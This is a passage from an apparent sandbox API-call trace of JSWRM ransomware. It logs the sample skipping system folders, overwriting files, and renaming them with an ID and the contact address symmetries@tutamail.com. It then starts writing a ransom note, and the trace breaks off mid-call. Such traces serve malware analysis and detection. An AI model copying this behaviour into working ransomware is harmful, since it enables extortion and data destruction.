lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="windows") returned -1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="recovery") returned 1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="perflogs") returned 1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="documents and settings") returned 1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="$RECYCLE.BIN") returned 1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="system volume information") returned -1 [0067.647] lstrcmpiW (lpString1="ServiceWatcherSchedule.xml", lpString2="msocache") returned 1 [0067.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceWatcherSchedule.xml", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0067.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0067.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceWatcherSchedule.xml", cchWideChar=26, lpMultiByteStr=0x2413d0, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ServiceWatcherSchedule.xml", lpUsedDefaultChar=0x0) returned 26 [0067.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0067.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceWatcherSchedule.xml", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0067.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ServiceWatcherSchedule.xml", cchWideChar=26, lpMultiByteStr=0x2410d8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ServiceWatcherSchedule.xml", lpUsedDefaultChar=0x0) returned 26 [0067.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0067.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0067.647] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0067.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.647] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0067.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.648] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4450) returned 1 [0067.648] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1160) returned 0x24d1d8 [0067.648] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x1160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x1160, lpOverlapped=0x0) returned 1 [0067.649] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.649] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x1160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x1160, lpOverlapped=0x0) returned 1 [0067.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.650] CloseHandle (hObject=0x454) returned 1 [0067.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0067.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.650] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.650] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.650] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0067.651] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0067.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x1fc808 [0067.651] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f158 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.651] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\ServiceWatcherSchedule.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\servicewatcherschedule.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0067.651] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbe3eab00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x101458, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="StreamServer.dll", cAlternateFileName="STREAM~1.DLL")) returned 1 [0067.651] lstrcmpiW (lpString1="StreamServer.dll", lpString2=".") returned 1 [0067.651] lstrcmpiW (lpString1="StreamServer.dll", lpString2="..") returned 1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="...") returned 1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="windows") returned -1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="recovery") returned 1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="perflogs") returned 1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="documents and settings") returned 1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="system volume information") returned -1 [0067.652] lstrcmpiW (lpString1="StreamServer.dll", lpString2="msocache") returned 1 [0067.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StreamServer.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StreamServer.dll", cchWideChar=16, lpMultiByteStr=0x2411c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StreamServer.dll", lpUsedDefaultChar=0x0) returned 16 [0067.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StreamServer.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0067.652] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="StreamServer.dll", cchWideChar=16, lpMultiByteStr=0x241060, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="StreamServer.dll", lpUsedDefaultChar=0x0) returned 16 [0067.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0067.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0067.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0067.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.652] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0xefec0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ucrtbase.dll", cAlternateFileName="")) returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2=".") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="..") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="...") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="windows") returned -1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="recovery") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="perflogs") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="documents and settings") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="system volume information") returned 1 [0067.652] lstrcmpiW (lpString1="ucrtbase.dll", lpString2="msocache") returned 1 [0067.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0067.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0067.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ucrtbase.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ucrtbase.dll", lpUsedDefaultChar=0x0) returned 12 [0067.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0067.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0067.653] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x5f4b0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="vccorlib140.dll", cAlternateFileName="VCCORL~1.DLL")) returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2=".") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="..") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="...") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="windows") returned -1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="recovery") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="perflogs") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="documents and settings") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="system volume information") returned 1 [0067.653] lstrcmpiW (lpString1="vccorlib140.dll", lpString2="msocache") returned 1 [0067.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0067.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0067.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vccorlib140.dll", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vccorlib140.dll", lpUsedDefaultChar=0x0) returned 15 [0067.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.653] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.653] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.653] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0067.653] lstrcmpiW (lpString1="vcruntime140.dll", lpString2=".") returned 1 [0067.653] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="..") returned 1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="...") returned 1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="windows") returned -1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="recovery") returned 1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="perflogs") returned 1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="documents and settings") returned 1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="system volume information") returned 1 [0067.654] lstrcmpiW (lpString1="vcruntime140.dll", lpString2="msocache") returned 1 [0067.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x241128, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0067.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.654] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vcruntime140.dll", cchWideChar=16, lpMultiByteStr=0x241330, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vcruntime140.dll", lpUsedDefaultChar=0x0) returned 16 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.654] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.654] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d7a486, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d7a486, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x15ab0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 0 [0067.654] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0067.654] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0067.654] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb3e1c92c, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb3e1c92c, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="ink", cAlternateFileName="")) returned 1 [0067.654] lstrcmpiW (lpString1="ink", lpString2=".") returned 1 [0067.654] lstrcmpiW (lpString1="ink", lpString2="..") returned 1 [0067.654] lstrcmpiW (lpString1="ink", lpString2="...") returned 1 [0067.654] lstrcmpiW (lpString1="ink", lpString2="windows") returned -1 [0067.654] lstrcmpiW (lpString1="ink", lpString2="recovery") returned -1 [0067.655] lstrcmpiW (lpString1="ink", lpString2="perflogs") returned -1 [0067.655] lstrcmpiW (lpString1="ink", lpString2="documents and settings") returned 1 [0067.655] lstrcmpiW (lpString1="ink", lpString2="$RECYCLE.BIN") returned 1 [0067.655] lstrcmpiW (lpString1="ink", lpString2="system volume information") returned -1 [0067.655] lstrcmpiW (lpString1="ink", lpString2="msocache") returned -1 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0067.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0067.655] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\jswrm-decrypt.hta")) returned 0xffffffff [0067.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.655] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0067.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0067.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.655] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.655] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.655] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0067.656] SetFilePointer (in: hFile=0x298, 